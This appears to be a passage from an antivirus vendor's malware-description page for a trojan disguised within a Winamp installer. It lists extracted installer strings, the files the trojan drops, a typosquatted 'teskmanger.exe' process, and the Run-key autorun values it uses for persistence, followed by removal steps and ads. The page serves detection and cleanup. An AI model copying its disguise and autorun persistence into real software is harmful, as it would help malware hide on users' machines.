SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
All Files|*.*
callback%d
kernel32.dll
wininet.dll
nsg3.tmp
File: wrote 5120 to "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll"
~1\Temp\nsg3.tmp\LangDLL.dll"
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
:\Program Files\winamp5666_full_all.exe"
"%Program Files%\winamp5666_full_all.exe"
%Program Files%\Winamp
%Program Files%
winamp5666_full_all.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\winamp5666_full_all.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\install.ini
Visit hXXp://VVV.winamp.com/ for updates.
5.6.6.3516

teskmanger.exe_516_rwx_0099A000_00002000:

.KNyZX

teskmanger.exe_516_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    downloader c sharp.exe:652
    %original file name%.exe:632
    netsh.exe:1480

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\teskmanger.exe (65 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (1961 bytes)
    %Program Files%\winamp5666_full_all.exe (390963 bytes)
    %Program Files%\winamp\winamp\Uninstall.ini (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
    %Program Files%\winamp\winamp\Uninstall.exe (4436 bytes)
    %Program Files%\downloader c sharp.exe (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (47091 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\LangDLL.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (45697 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now